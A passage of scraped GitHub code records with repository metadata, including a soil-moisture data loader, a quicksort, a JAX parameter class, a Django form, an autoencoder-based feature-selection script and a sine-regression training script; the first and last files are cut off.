get_soil_prep_date(csv_path,prename):\n '''\n returns soil and prep data list of 13 stations.\n usage:\n \n csv_path = \"/Users/alperbalmumcu/Github/sen1-sen2-soil-moisture/RISMA/dataset/datasets/\"\n prename = \"Manitoba_Station_\"\"\n soil, prep = get_soil_prep(csv_path,prename)\n '''\n soil_list = []\n prep_list = []\n date_list = []\n \n for idx in range(1,14):\n read_csv = dataset.read_csv(csv_path + prename + str(idx) + \".csv\")\n soil_list.append(read_csv['0-5cm Soil'])\n prep_list.append(read_csv['Precipitation Precip (mm)'])\n date_list.append(read_csv['Date'])\n \n return soil_list,prep_list,date_list\n \n def merge_datasets_wdates(date_list,soil_list,prep_list):\n '''\n inputs are date_list, soil_list and prep_list respectfully.\n returns merged dataframe.\n '''\n df_list = []\n for i in range(13):\n dfs = pd.DataFrame(list(zip(date_list[i],soil_list[i],prep_list[i])), \n columns= ['Date', f'Soil_{str(i+1)}',f'Prep_{str(i+1)}'])\n df_list.append(dfs)\n df_merged = reduce(lambda left,right: pd.merge(left,right,on=['Date'],\n how='outer'), df_list)\n df = df_merged.replace(np.nan,'',regex=True)\n df = df.replace('No Data', '')\n df = df.sort_values(by='Date')\n\n for i in range(1,14):\n df[f'Soil_{str(i)}'] = pd.to_numeric(df[f'Soil_{str(i)}'], downcast=\"float\")\n df[f'Prep_{str(i)}'] = pd.to_numeric(df[f'Prep_{str(i)}'], downcast=\"float\")\n\n df['Date'] = pd.to_datetime(df['Date'], infer_datetime_format=True) \n return df\n \n \n \n \n\n \n\n \n\n","repo_name":"abalmumcu/sen1-sen2-soil-moisture","sub_path":"RISMA/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41988657393","text":"def partition(array, low, high):\n \n\n pivot = array[high]\n \n\n i = low - 1\n \n\n for j in range(low, high):\n if array[j] <= pivot:\n\n i = i + 1\n\n (array[i], array[j]) = (array[j], array[i])\n \n # Swap the pivot element with \n # e greater element specified by i\n (array[i + 1], array[high]) = (array[high], array[i + 1])\n \n # Return the position from where partition is done\n return i + 1\n \n# Function to perform quicksort\n \n \ndef quick_sort(array, low, high):\n if low < high:\n \n # Find pivot element such that\n # element smaller than pivot are on the left\n # element greater than pivot are on the right\n pi = partition(array, low, high)\n \n # Recursive call on the left of pivot\n quick_sort(array, low, pi - 1)\n \n # Recursive call on the right of pivot\n quick_sort(array, pi + 1, high)\n \n \n# Driver code\narray = [103, 73, 83, 39, 31, 3]\nquick_sort(array, 0, len(array) - 1)\n \nprint(f'Sorted array: {array}')\n","repo_name":"alexenux/algorithm-collector","sub_path":"quick sort .py","file_name":"quick sort .py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70399166842","text":"from typing import Any, Dict, Union\n\nimport jax.numpy as jnp\nimport tensorflow_probability.substrates.jax as tfp\nfrom jax.tree_util import tree_map, tree_structure\n\nfrom gpfy.typing import BijectorDict, ConstantDict, TrainableDict, VariableDict\nfrom gpfy.utils import PyTreeNode, field\n\npositive = tfp.bijectors.Exp\nidentity = tfp.bijectors.Identity\n\n\nclass Param(PyTreeNode):\n \"\"\"\n Basic `PyTreeNode` that holds information regarding all the parameters of an initialised object.\n\n Attributes:\n params: A dictionary holding a collection of parameterised objects with a mapping to their\n parameters.\n _trainables: A dictionary with the same structure as `params` that specifies if a parameter\n is trainable or not. It defaults to `True` for all unspecified parameters.\n _bijectors: A dictionary with the same structure as `params` that specifies the required\n bijector to transform to the unconstrained space. It defaults to a positive\n `tfp.bijectors.Exp` for all unspecified parameters.\n constants: A dictionary that holds information for additional variables that are considered\n constant during optimisation.\n _constrained: A flag specifying if the parameters are constrained or not.\n\n Note that only the `params` attribute acts as a pytree_node.\n \"\"\"\n\n params: VariableDict = field(default_factory=dict, pytree_node=True)\n _trainables: TrainableDict = field(default_factory=dict, pytree_node=False)\n _bijectors: BijectorDict = field(default_factory=dict, pytree_node=False)\n constants: ConstantDict = field(default_factory=dict, pytree_node=False)\n _constrained: bool = field(default=True, pytree_node=False)\n\n def _has_valid_keys(self) -> None:\n \"\"\"\n Checks if the provided collections have the same structure as the `self.params`.\n\n Raises:\n ValueError: if the user specified `self._trainables is not a subtree of `self.params`.\n ValueError: if the user specified `self._bijectors is not a subtree of `self.params`.\n ValueError: if the user specified `self._constants has collections other than\n the ones in `self.params` or `\"sphere\"`.\n \"\"\"\n # valid_keys = set(self.params.keys())\n # param_tree = jax.tree_util.tree_flatten_with_path(self.params)[1]\n # trainables_tree = jax.tree_util.tree_flatten_with_path(self._trainables)[1]\n # bijectors_tree = jax.tree_util.tree_flatten_with_path(self._bijectors)[1]\n if not self._is_subtree(self._trainables, self.params):\n raise ValueError(\"Invalid key in `_trainables`\")\n if not self._is_subtree(self._bijectors, self.params):\n raise ValueError(\"Invalid key in `_bijectors`\")\n if not all(\n collection in self.params or collection == \"sphere\"\n for collection in self.constants.keys()\n ):\n raise ValueError(\"Invalid key in `_constants`\")\n\n def _is_subtree(self, t1: Union[VariableDict, Any], t2: Union[VariableDict, Any]) -> bool:\n \"\"\"\n Check if `t1` is subtree of `t2`, strating from the same level.\n\n Args:\n t1: a `VariableDict` pytree or a leaf node\n t2: a `VariableDict` pytree or a leaf node\n\n Returns:\n If `t1` is a subtree of `t2`.\n \"\"\"\n if isinstance(t1, Dict) and isinstance(t2, Dict):\n ret = []\n for k1 in t1.keys():\n if k1 in t2: # Check if a subtree of t1 has same structure as in t2\n ret.append(self._is_subtree(t1[k1], t2[k1]))\n else:\n return False\n return all(ret)\n elif isinstance(t2, Dict): # t1 is a leaf but t2 is a tree\n return False\n else: # both t1 and t2 are leaves\n return True\n\n def _tree_update_from_subtree(self, t1: VariableDict, t2: VariableDict) -> VariableDict:\n \"\"\"\n Update tree `t1` from subtree `t2`.\n\n Args:\n t1: a `VariableDict` pytree.\n t2: a `VariableDict` pytree.\n\n Returns:\n A `VariableDict` with the updated values.\n \"\"\"\n ret = {}\n for k1, v1 in t1.items():\n if k1 in t2: # k1 needs to be updated\n if isinstance(v1, Dict): # v1 is a tree so recurse\n ret[k1] = self._tree_update_from_subtree(t1[k1], t2[k1])\n else:\n ret[k1] = t2[k1] # we have a leaf so update the value\n else:\n if isinstance(v1, Dict): # check if t2 is a subtree of t1 so we need to recurse\n ret[k1] = self._tree_update_from_subtree(t1[k1], t2)\n else:\n ret[k1] = v1 # no update needed\n return ret\n\n def __post_init__(self) -> None:\n \"\"\"\n Runs automatically after the `__init__` of the dataclass to do further checks.\n \"\"\"\n # check we have valid keys in all dicts\n self._has_valid_keys()\n\n # initialise the trainable status to `True` for all unpsecified variables\n trainables = self._trainables\n if not trainables or (tree_structure(trainables) != tree_structure(self.params)):\n trainables = tree_map(lambda _: True, self.params)\n trainables = self._tree_update_from_subtree(trainables, self._trainables)\n\n # initialising the bijectors to `positive` for all unpsecified variables\n bijectors = self._bijectors\n if not bijectors or (\n tree_structure(bijectors, is_leaf=lambda x: isinstance(x, tfp.bijectors.Bijector))\n != tree_structure(self.params)\n ):\n bijectors = tree_map(lambda _: positive(), self.params)\n bijectors = self._tree_update_from_subtree(bijectors, self._bijectors)\n\n # make sure all params are Arrays with float64 dtype\n params = tree_map(lambda x: jnp.array(x, dtype=jnp.float64), self.params)\n\n # write back the modified `VariableDict`s\n object.__setattr__(self, \"params\", params)\n object.__setattr__(self, \"_trainables\", trainables)\n object.__setattr__(self, \"_bijectors\", bijectors)\n\n def replace_param(self, collection: str, **kwargs) -> \"Param\":\n \"\"\"\n Replace the value of parameters in the `VariableDict` from a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new value of the target variables within the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated variables.\n \"\"\"\n if collection not in self.params:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self.params[collection], kwargs)\n # then update the params with the newly updated collection\n updates = self._tree_update_from_subtree(self.params, updates)\n return self.replace(params=updates)\n\n def set_trainable(self, collection: str, **kwargs) -> \"Param\":\n \"\"\"\n Replace the trainable status of parameters in a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new trainable status of the target variables within\n the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated trainable status of the variables.\n \"\"\"\n if collection not in self._trainables:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self._trainables[collection], kwargs)\n # then update the trainables with the newly updated collection\n updates = self._tree_update_from_subtree(self._trainables, updates)\n return self.replace(_trainables=updates)\n\n def set_bijector(self, collection: str, **kwargs):\n \"\"\"\n Replace the bijector of parameters in a specified `collection`.\n\n Args:\n collection: the name of the collection that holds the target variable.\n kwargs: The name and the new bijector of the target variables within the `collection`.\n\n Raises:\n ValueError: if the specified `collection` is not present in the `param` `VariableDict`.\n\n Returns:\n A new `Param` with the updated bijectors of the variables.\n \"\"\"\n if collection not in self._trainables:\n raise ValueError(f\"there is no {collection} collection\")\n\n # first update the subtree within the specified collection\n updates = self._tree_update_from_subtree(self._bijectors[collection], kwargs)\n # then update the bijectors with the newly updated collection\n updates = self._tree_update_from_subtree(self._bijectors, updates)\n return self.replace(_bijectors=updates)\n\n def unconstrained(self) -> \"Param\":\n \"\"\"\n Move the `params` in the unconstrained (optimisation) space to optimise over them.\n\n NOTE: There is the logic to check if it is already unconstrained and return the same object,\n I just need to test it.\n\n Returns:\n The `Param` with the variables at the unconstrained space (the optimisation space).\n \"\"\"\n # if self._constrained:\n unconstrained_params = tree_map(lambda p, t: t.inverse(p), self.params, self._bijectors)\n return self.replace(_constrained=False, params=unconstrained_params)\n # else:\n # return self\n\n def constrained(self) -> \"Param\":\n \"\"\"\n Move the `params` in the (original) constrained space.\n\n NOTE: There is the logic to check if it is already unconstrained and return the same object,\n I just need to test it.\n\n Returns:\n The `Param` with the variables at the constrained space (the original space).\n \"\"\"\n # if not self._constrained:\n constrained_params = tree_map(lambda p, t: t.forward(p), self.params, self._bijectors)\n return self.replace(_constrained=True, params=constrained_params)\n # else:\n # return self\n","repo_name":"stefanosele/GPfY","sub_path":"src/gpfy/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":10603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"3585765541","text":"# 2022/09/04 Baek 2630\n\nN = int(input())\ngraph = []\nfor _ in range(N):\n graph.append(list(map(int, input().split())))\n\ndef check(graph):\n global white_cnt, blue_cnt\n if graph[0][0] == 1:\n for row in range(len(graph)):\n for col in range(len(graph[0])):\n if graph[row][col] == 0:\n return False\n blue_cnt += 1\n return True\n else:\n for row in range(len(graph)):\n for col in range(len(graph[0])):\n if graph[row][col] == 1:\n return False\n white_cnt += 1\n return True\n\nwhite_cnt = 0\nblue_cnt = 0\n\ndef count_paper(graph):\n result = check(graph)\n if result == True:\n return\n count_paper([i[:len(graph)//2] for i in graph[:len(graph)//2]])\n count_paper([i[len(graph)//2:] for i in graph[:len(graph)//2]])\n count_paper([i[:len(graph)//2] for i in graph[len(graph)//2:]])\n count_paper([i[len(graph)//2:] for i in graph[len(graph)//2:]])\n\ncount_paper(graph)\nprint(white_cnt)\nprint(blue_cnt)\n","repo_name":"kkw2758/Algorithm","sub_path":"etc/baek_2630.py","file_name":"baek_2630.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34433878546","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import widgets\n\nfrom .models import author, type_book, publisher\n\n\nclass BookForm(forms.Form):\n name = forms.CharField(\n max_length=20,\n min_length=2,\n widget=widgets.TextInput( # 选择html控件\n attrs={\n 'class': 'form-control', # 设置控件属性,如设置class的样式\n 'placeholder': '书名',\n 'id': 'bookname',\n }\n )\n )\n\n publish_year = forms.DateField(\n widget=widgets.DateInput(\n attrs={\n 'placeholder': '出版日期:2017-01-01',\n 'class': 'form-control',\n 'id': 'publish_year',\n }\n ),\n )\n\n price = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '价格',\n 'class': 'form-control',\n 'id': 'price',\n }\n )\n )\n stock = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '库存',\n 'class': 'form-control',\n 'id': 'stocks',\n }\n )\n )\n author = forms.MultipleChoiceField(\n choices=author.objects.all().values_list('id', 'name'), # 将queryset转换成list\n widget=widgets.SelectMultiple(\n attrs={\n 'id': 'demo-cs-multiselect',\n # 'value': '作者选择',\n }\n )\n )\n status = forms.ChoiceField(\n choices=[(1, '出版'), (2, '未出版'), ],\n widget=widgets.Select(\n attrs={\n 'type': 'select',\n 'class': 'magic-select',\n 'id': 'status',\n }\n )\n )\n\n type = forms.ChoiceField(\n choices=type_book.objects.all().values_list('id', 'typebook'),\n widget=widgets.Select(\n attrs={\n \"data-live-search\": \"true\",\n \"data-width\": \"100%\",\n 'class': 'selectpicker',\n 'id': 'type',\n }\n )\n )\n publisher = forms.ChoiceField(\n choices=publisher.objects.all().values_list('id', 'name'),\n widget=widgets.Select(\n attrs={\n 'class': 'selectpicker',\n 'data-live-search': 'True',\n 'data-width': '100%',\n 'id': 'publisher',\n }\n )\n )\n\n\nclass DetailForm(forms.Form):\n chapter = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '章节',\n 'class': 'form-control',\n 'id': 'chapter',\n }\n )\n )\n\n pages = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '页数',\n 'class': 'form-control',\n 'id': 'pages',\n }\n )\n )\n\n words = forms.IntegerField(\n widget=widgets.NumberInput(\n attrs={\n 'placeholder': '字数',\n 'class': 'form-control',\n 'id': 'words',\n }\n )\n )\n\n contentinfo = forms.CharField(\n widget=widgets.Textarea(\n attrs={\n 'rows': 8,\n 'placeholder': '图书简介',\n 'class': 'form-control',\n 'id': 'demo-textarea-input-1',\n }\n )\n )\n catalog = forms.CharField(\n widget=widgets.Textarea(\n attrs={\n 'rows': 8,\n 'placeholder': '目录',\n 'class': 'form-control',\n 'id': 'demo-textarea-input-2',\n }\n )\n )\n logo = forms.ImageField(\n allow_empty_file=True,\n widget=widgets.FileInput(\n attrs={\n 'id': 'logo_file',\n 'class': 'file-input-new btn btn-primary btn-file',\n 'style': \" margin: auto;\",\n 'required':'false',\n }\n )\n )\n","repo_name":"jxs1211/mybook","sub_path":"managerbook/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27040636744","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 15:33:06 2019\r\n\r\n@author: yanglei\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport time\r\nfrom keras.layers import Dense, Input\r\nfrom keras.models import Model\r\nimport sklearn.neighbors as skn\r\nfrom scipy.spatial.distance import cosine\r\nfrom scipy.io import loadmat,savemat\r\ntime_s=time.time()\r\n\r\ndef load_data():\r\n path='./dataset/mnist.npz'\r\n f=np.load(path)\r\n x_train,y_train=f['x_train'],f['y_train']\r\n x_test,y_test=f['x_test'],f['y_test']\r\n f.close() \r\n return (x_train,y_train),(x_test,y_test)\r\n\r\ndef re_measure(x_train,x_test):\r\n # create copies of the data\r\n n,d=x_train.shape\r\n print(n,d)\r\n \r\n remain_idx = list(set(list(range(d))))\r\n \r\n input_dim = Input(shape = (d, ))\r\n encoding_dim = 300\r\n encoded = Dense(encoding_dim, activation = 'sigmoid')(input_dim)\r\n decoded = Dense(d, activation = 'sigmoid')(encoded)\r\n autoencoder = Model(input = input_dim, output = decoded)\r\n autoencoder.compile(optimizer = 'adadelta', loss = 'mse')\r\n autoencoder.fit(x_train, x_train, nb_epoch = 20, batch_size = 128, shuffle = True, validation_data = (x_test, x_test),verbose=0)\r\n auto_acc_list = [] \r\n x_train_auto = x_train\r\n \r\n #remove feat_idx 特征,记录其cost\r\n for feat_idx in range(d):\r\n x_train = x_train_auto\r\n x_train = x_train.transpose()\r\n new_x_train = np.append(x_train[:feat_idx], np.full((1, x_train.shape[1]), np.mean(x_train[feat_idx])), axis=0)\r\n x_train = np.append(new_x_train, x_train[feat_idx+1:], axis=0)\r\n x_train = x_train.transpose()\r\n x_train_encoded = autoencoder.predict(x_train,verbose=0)\r\n auto_cost = x_train_encoded - x_train_auto\r\n auto_cost = auto_cost ** 2\r\n auto_cost = sum(sum(auto_cost))\r\n \r\n #取出当前feat_idx在 原特征集中的 index\r\n index=remain_idx[feat_idx]\r\n auto_acc_list.append((index, auto_cost))\r\n \r\n cost_array = [auto_acc[1] for auto_acc in auto_acc_list]\r\n cost_array = np.array(cost_array)\r\n cost_array = (cost_array - min(cost_array))/ (max(cost_array) - min(cost_array))\r\n for auto_index in range(len(auto_acc_list)):\r\n auto_acc_list[auto_index] = (auto_acc_list[auto_index][0], cost_array[auto_index])\r\n auto_acc_list.sort(key=lambda x: x[1])\r\n #np.save('./selected_feature/selected_fea_AE_cost_scaler.npy',auto_acc_list) \r\n\r\n #auto_acc_list=np.load('./selected_feature/selected_fea_AE_cost_scaler.npy')\r\n z=0\r\n auto_acc_list1=np.asarray(auto_acc_list)\r\n auto_acc_list=list(auto_acc_list1[np.argsort(-auto_acc_list1[:,1])])\r\n print(auto_acc_list)\r\n #auto_acc_list.sort(key=lambda x: -x[1])\r\n cost_list=[i[1] for i in auto_acc_list]\r\n auto_sum=np.sum(cost_list)\r\n r=0.9\r\n for i in range(d):\r\n #threshold=1-(np.sum(cost_list[:i])/auto_sum)\r\n threshold=(np.sum(cost_list[:i])/auto_sum)\r\n if(threshold>r):\r\n z=i\r\n print(threshold)\r\n break\r\n print('re selected feature : ',z)\r\n final_index=[int(i[0]) for i in auto_acc_list][:z]\r\n #np.save('./selected_feature/re_selected_index.npy',final_index)\r\n print()\r\n time_end=time.time()\r\n print('total time:',time_end-time_s)\r\n return final_index\r\n\r\ndef cosine_dis(x,y):\r\n s=(np.linalg.norm(x)*np.linalg.norm(y))\r\n if(s==0):\r\n return 0\r\n else:\r\n return np.dot(x,y)/s\r\n\r\n\r\n#non-local distances\r\ndef cosine_dis_nonlocal(x,y):\r\n s=(np.linalg.norm(x)*np.linalg.norm(y))\r\n if(s==0):\r\n return 0\r\n else:\r\n if(np.dot(x,y)==0):\r\n return 0\r\n else:\r\n return 1/(np.dot(x,y)/s)\r\n\r\ndef knn_graph_local(X,k):\r\n d,n=np.shape(X)\r\n A=skn.kneighbors_graph(X.transpose(),n_neighbors=k,mode='distance',metric=cosine_dis,include_self=None)\r\n A=A.toarray()\r\n D=np.zeros([n,n])\r\n for i in range(n):\r\n D[i,i]=np.sum(A[i,:])\r\n L=D-A\r\n return L\r\ndef knn_graph_nonlocal(X,k):\r\n d,n=np.shape(X)\r\n A=skn.kneighbors_graph(X.transpose(),n_neighbors=k,mode='distance',metric=cosine_dis_nonlocal,include_self=None)\r\n A=A.power(-1)\r\n A=A.toarray()\r\n D=np.zeros([n,n])\r\n for i in range(n):\r\n D[i,i]=np.sum(A[i,:])\r\n L=D-A\r\n return L\r\n\r\ndef xavier_init(fan_in,fan_out,constant=1):\r\n low=-constant*np.sqrt(6.0/(fan_in+fan_out))\r\n high=constant*np.sqrt(6.0/(fan_in+fan_out))\r\n return np.random.uniform(low=low,high=high,size=(fan_in,fan_out))\r\n\r\ndef y_encode(W1,b1,x,m):\r\n return 1/(1+np.exp(-(np.dot(W1,x).reshape([m,1])+b1)))\r\n\r\ndef Xre_decode(W2,b2,y,d):\r\n return 1/(1+np.exp(-(np.dot(W2,y).reshape([d,1])+b2)))\r\n\r\ndef sigmid(x):\r\n return 1/(1+np.exp(-x))\r\n\r\ndef objective_opt(X,m,gam,lam,bate,k):\r\n d,n=np.shape(X) # !!! row is feature column is the number of sample \r\n print(n,d)\r\n e=0.0001\r\n max_iteration=300\r\n diff=0.00001\r\n fun_diff=1\r\n iteration=0\r\n prior_fun=10000\r\n \r\n W1=xavier_init(m,d)\r\n W2=xavier_init(d,m)\r\n b1=xavier_init(m,1)\r\n b2=xavier_init(d,1)\r\n \r\n Y=np.zeros([m,n])\r\n Xre=np.zeros([d,n])\r\n U=np.eye(d)\r\n #L=knn_graph(X,k)\r\n L1=knn_graph_local(X,k)\r\n Ln=knn_graph_nonlocal(X,k)\r\n \r\n score_index=0\r\n score_result=np.zeros((max_iteration+1,1))\r\n \r\n #stop condition:(1) max iteration (2)the difference between two iteration of obecjive_fun less than threshold\r\n while((iteration<=max_iteration)and(fun_diff>=diff)):\r\n for i in range(n):\r\n Y[:,i]=y_encode(W1,b1,X[:,i],m).reshape(m,)\r\n Xre[:,i]=Xre_decode(W2,b2,Y[:,i],d).reshape(d,)\r\n \r\n #objective function\r\n L_fun=(1/(2*n))*np.power(np.linalg.norm((X-Xre),ord='fro'),2)\r\n R_fun=lam*np.linalg.norm( np.linalg.norm(W1,axis=0),ord=1 ) #先对列求2范数,再求1范数\r\n G_fun=gam*np.ndarray.trace( np.dot(np.dot(Y,L1), Y.transpose()) ) /\\\r\n (np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) ))\r\n W_fun=bate*(np.linalg.norm(W1,ord='fro')+np.linalg.norm(W2,ord='fro')+np.linalg.norm(b1,ord='fro')+np.linalg.norm(b2,ord='fro'))\r\n F_fun=L_fun+R_fun+G_fun+W_fun\r\n \r\n fun_diff=abs(prior_fun-F_fun)\r\n prior_fun=F_fun\r\n \r\n \r\n delta3=np.multiply( np.multiply( (Xre-X),Xre ) , (np.ones([d,n])-Xre) )\r\n delta2=np.multiply( np.multiply( np.dot(W2.transpose(),delta3) ,Y) ,(np.ones([m,n])-Y) )\r\n \r\n #compute U matrix\r\n for i in range(d):\r\n nm=np.linalg.norm(W1[:,i])\r\n if(nm==0):\r\n U[i,i]=0\r\n else:\r\n U[i,i]=1/(nm+e)\r\n \r\n #the partial of F_fun \r\n part1=np.dot(Y,L1)/ (np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) ))\r\n part2=np.dot(Y,Ln)/ np.power((np.ndarray.trace( np.dot(np.dot(Y,Ln), Y.transpose()) )) ,2)\r\n part=part1-part2\r\n W1_partial=(1/n)*np.dot(delta2,X.transpose())+lam*np.dot(W1,U)+\\\r\n 2*gam*np.dot( np.multiply(np.multiply(part,Y),(np.ones([m,n])-Y)) ,X.transpose()) + bate*W1\r\n W2_partial=(1/n)*np.dot(delta3,Y.transpose())+bate*W2\r\n b1_partial=(1/n)*np.dot(delta2,np.ones([n,1]))+\\\r\n 2*gam*np.dot( np.multiply(np.multiply(part,Y),(np.ones([m,n])-Y)) ,np.ones([n,1]))+bate*b1\r\n b2_partial=(1/n)*np.dot(delta3,np.ones([n,1]))+bate*b2\r\n \r\n W1=W1-0.1*W1_partial\r\n W2=W2-0.1*W2_partial\r\n b1=b1-0.1*b1_partial\r\n b2=b2-0.1*b2_partial\r\n \r\n print(iteration,F_fun,fun_diff)\r\n score_result[score_index]=F_fun\r\n score_index+=1\r\n iteration+=1\r\n #print(W1)\r\n score=np.zeros([d,])\r\n for i in range(d):\r\n score[i]=np.linalg.norm(W1[:,i])\r\n index=np.argsort(score)\r\n #index_fin=(index+1) #index+1\r\n savemat('iteration',{'score':score_result})\r\n return index\r\n\r\ndef fc_measure(selected_index,x_train):\r\n x_train=x_train.transpose()[selected_index,:] #!!!!\r\n print(x_train.shape)\r\n final_feature=objective_opt(x_train,m=300,lam=0.01,gam=0.005,bate=0.01,k=5)\r\n selected_index=np.asarray(selected_index)\r\n index=selected_index[final_feature]\r\n #savepath='./final_index/result_k(5)m(200)_iter(300)_a(0.1).npy'\r\n #np.save(savepath,index) \r\n\r\nif __name__=='__main__':\r\n (x_train, y_train), (x_test, y_test) = load_data()\r\n x_train = x_train.reshape(x_train.shape[0], 784)\r\n x_test = x_test.reshape(x_test.shape[0], 784)\r\n # preprocess the data\r\n x_train = x_train.astype('float32')[:10000,:]\r\n x_test = x_test.astype('float32')\r\n x_train /= 255\r\n x_test /= 255\r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 'train samples')\r\n print(x_test.shape[0], 'test samples') \r\n '''\r\n final_index=np.load('./selected_feature/re_selected_index.npy')\r\n selected_index=final_index\r\n '''\r\n selected_index=re_measure(x_train,x_test)\r\n fc_measure(selected_index,x_train)","repo_name":"Layla6/MREFC","sub_path":"MREFC.py","file_name":"MREFC.py","file_ext":"py","file_size_in_byte":9045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70416922042","text":"# %%\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim.swa_utils import AveragedModel, SWALR\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import BayesianRidge\nfrom models.nn_regression import RegressionNN\n\nplt.style.use('ggplot')\nmatplotlib.rcParams['figure.dpi'] = 200\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('argument for training')\n parser.add_argument('--activation_function', type=str, default='erf', help='activation function name')\n parser.add_argument('--trial', type=str, default='1', help='the experiment id')\n args = parser.parse_args()\n\n # %%\n model_save_root = './pretrained_models/sin_{}'.format(\n args.activation_function)\n if not os.path.isdir(model_save_root):\n os.makedirs(model_save_root)\n model_path = os.path.join(model_save_root, 'sin_model_{}.pth'.format(args.trial))\n swa_model_path = os.path.join(model_save_root, 'sin_swa_model_{}.pth'.format(args.trial))\n\n # %%\n sin_data = torch.load('./data/regression/sin_data_few_shot.pt')\n x_train = sin_data['x_train']\n x_test = sin_data['x_test']\n y_train = sin_data['y_train']\n y_test = sin_data['y_test']\n y_true_train = sin_data['y_true_train']\n y_true_test = sin_data['y_true_test']\n\n x_train, x_test, y_train = x_train.to(device), x_test.to(device), y_train.to(device)\n\n # %%\n model = RegressionNN(input_dim=1, emb_size=40, hidden_size=40, output_dim=500,\n activation_function=args.activation_function)\n model.train()\n model = model.to(device)\n # Use the adam optimizer\n optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=1e-4)\n swa_model = AveragedModel(model)\n swa_model = swa_model.to(device)\n swa_scheduler = SWALR(optimizer, swa_lr=0.05)\n\n new_model = RegressionNN(input_dim=1, emb_size=40, hidden_size=40, output_dim=500,\n activation_function=args.activation_function)\n new_model = new_model.to(device)\n new_swa_model = AveragedModel(new_model)\n new_swa_mode = new_swa_model.to(device)\n\n # %%\n batch_size = 64\n training_iter = 100000\n swa_start = 80000\n p_bar = tqdm(total=training_iter)\n p_bar.set_description(f'Begin training')\n for i in range(training_iter):\n idx = torch.randperm(len(x_train))[:batch_size]\n mini_batch_x, mini_batch_y = x_train[idx], y_train[idx]\n optimizer.zero_grad()\n output = model(mini_batch_x)\n loss = F.mse_loss(output, mini_batch_y)\n loss.backward()\n # print('Iter %d/%d - Loss: %.3f' % (i + 1, training_iter, loss.item()))\n optimizer.step()\n\n if i == swa_start:\n torch.save(model.state_dict(), model_path)\n\n if i >= swa_start:\n swa_model.update_parameters(model)\n swa_scheduler.step()\n\n desc = f'iter {i + 1} - loss {loss.item():.4f}'\n p_bar.set_description(desc)\n p_bar.update(1)\n\n p_bar.refresh()\n p_bar.close()\n\n torch.save(swa_model.state_dict(), swa_model_path)\n\n # %%\n new_model.load_state_dict(torch.load(model_path))\n new_swa_model.load_state_dict(torch.load(swa_model_path))\n new_model.eval()\n new_swa_model.eval()\n all_mse = []\n all_mse_swa = []\n for task_id in range(500):\n n_shots = 10\n idx = torch.randperm(len(x_test))\n support_idx, _ = torch.sort(idx[:n_shots])\n query_idx, _ = torch.sort(idx[n_shots:])\n x_support = x_test[support_idx]\n y_support = y_test[support_idx][:, task_id]\n x_query = x_test[query_idx]\n y_query = y_test[query_idx][:, task_id]\n y_true_query = y_true_test[query_idx][:, task_id]\n\n feature_support = new_model.extract_feature(x_support)\n feature_query = new_model.extract_feature(x_query)\n feature_support, feature_query = feature_support.detach().cpu().numpy(), feature_query.detach().cpu().numpy()\n feature_support_swa = new_swa_model.module.extract_feature(x_support)\n feature_query_swa = new_swa_model.module.extract_feature(x_query)\n feature_support_swa = feature_support_swa.detach().cpu().numpy()\n feature_query_swa = feature_query_swa.detach().cpu().numpy()\n y_support, y_query = y_support.cpu().numpy(), y_query.cpu().numpy()\n\n \"\"\"\n clf = Ridge(alpha=1.0)\n clf.fit(feature_support, y_support)\n pred_y = clf.predict(feature_query)\n mse = mean_squared_error(y_query, pred_y)\n all_mse.append(mse)\n\n clf_swa = Ridge(alpha=1.0)\n clf_swa.fit(feature_support_swa, y_support)\n pred_y_swa = clf_swa.predict(feature_query_swa)\n mse_swa = mean_squared_error(y_query, pred_y_swa)\n all_mse_swa.append(mse_swa)\n \"\"\"\n\n clf = BayesianRidge(tol=1e-6, alpha_init=1.0, lambda_init=0.01)\n clf.fit(feature_support, y_support)\n pred_y, std_y = clf.predict(feature_query, return_std=True)\n mse = mean_squared_error(y_query, pred_y)\n all_mse.append(mse)\n\n clf_swa = BayesianRidge(tol=1e-6, alpha_init=1.0, 